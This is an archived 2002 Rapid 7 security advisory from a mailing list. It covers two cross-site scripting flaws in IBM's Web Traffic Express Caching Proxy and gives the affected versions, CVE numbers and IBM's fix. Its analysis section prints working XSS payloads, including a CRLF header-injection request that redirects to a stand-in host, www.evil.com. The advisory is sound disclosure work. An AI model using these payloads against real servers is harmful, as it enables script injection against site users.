lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <OFD4D8F53A.BEAD9A64-ON85256C5B.0069DACC-88256C5B.00698839@hq.rapid7.com>
From: advisory at rapid7.com (Rapid 7 Security Advisories)
Subject: R7-0008: IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting
 Issues

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________
                     Rapid 7, Inc. Security Advisory

        Visit http://www.rapid7.com/ to download NeXpose(tm), our
         advanced vulnerability scanner. Linux and Windows 2000
                       versions are available now!
_______________________________________________________________________

Rapid 7 Advisory R7-0008
IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

   Published:  October 23, 2002
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0008.txt

   o First XSS issue (standard XSS)
      IBM:        APAR# IY24527

      CVE:        CAN-2002-1167
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1167

      Bugtraq:    6000
      http://online.securityfocus.com/bid/6000

   o Second XSS issue (HTTP header injection)
      IBM:        APAR# IY35139

      CVE:        CAN-2002-1168
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1168

      Bugtraq:    6001
      http://online.securityfocus.com/bid/6001

1. Affected system(s):

   KNOWN VULNERABLE:
    o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
      with IBM WebSphere Edge Server v2.0)
    o IBM Web Traffic Express Caching Proxy Server v3.6

2. Summary

   IBM Web Traffic Express Caching Proxy server is vulnerable to
   cross site scripting.  The Caching Proxy server allows script code
   to be injected into pages using standard cross-site scripting
   techniques.  A second, variant attack allows the HTTP headers to
   be manipulated.

   IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
   v2.0.  IBM Web Traffic Express v3.6 and earlier were separately
   shipping products. 

3. Vendor status and information

   IBM Software
   http://www-3.ibm.com/software/webservers/edgeserver/index.html

      IBM was notified of this issue and has released efix build number
      4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue
      and other security issues (see Rapid 7 advisory R7-0007 for more
      information: http://www.rapid7.com/advisories/R7-0007.txt ).
 
      IBM is tracking the first (standard) XSS issue as APAR# IY24527.
      IBM is tracking the second (header injection) XSS issue as
      APAR# IY35139.

4. Solution

   IBM customers should install Caching Proxy efix build 4.0.1.26 or
   higher.  Efix builds can be downloaded from IBM's secure FTP site.
   For more information on obtaining efix builds, contact IBM support
   with the APAR numbers listed above.

   The fixes have also been ported back to the Web Traffic Express v3.6
   code base.  Customers running v3.6 should contact IBM support for
   more information on how to upgrade to a newer build.

5. Detailed analysis

   There are two XSS techniques that can be used against the caching
   proxy server.  Please note that the following text may be
   wrapped or otherwise mangled by mail clients or gateways.  You
   should refer to the original advisory if there is a question about
   the exact text.

   a) Standard XSS exploit against Web Traffic Express Caching Proxy

   Request the following path from the caching proxy server:

      /"><img%20src="javascript:alert(document.domain)">

   b) XSS exploit against Web Traffic Express Caching Proxy, adding a
      second "Location:" header by using %0a%0d

   telnet www.victim.com 80
   Trying 192.168.100.1...
   Connected to www.victim.com.
   Escape character is '^]'.
   GET 
/%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert(document.domain)"> 
HTTP/1.0

   HTTP/1.1 302 Found
   Server: IBM-PROXY-WTE-US/3.6
   Date: Fri, 18 Oct 2002 03:44:18 GMT
   Location: http://www.victim.com/;www.victim.com/
   Location: http:/www.evil.com/<img 
src="javascript:alert(document.domain)">
   Accept-Ranges: bytes
   Content-Type: text/html
   Content-Length: 443
   Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT

   ...

6. Contact Information

   Rapid 7 Security Advisories
   Email:   advisory@...id7.com
   Web:     http://www.rapid7.com/
   Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

   Rapid 7, Inc. is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (OpenBSD)

iD8DBQE9tuwTcL76DCfug6wRAjNRAJ4qMUKne/vS+7k41XXYKS0wZ4PBFwCfdl8J
+BWWNXDgIxkFJT1tiKzaHW4=
=icsO
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ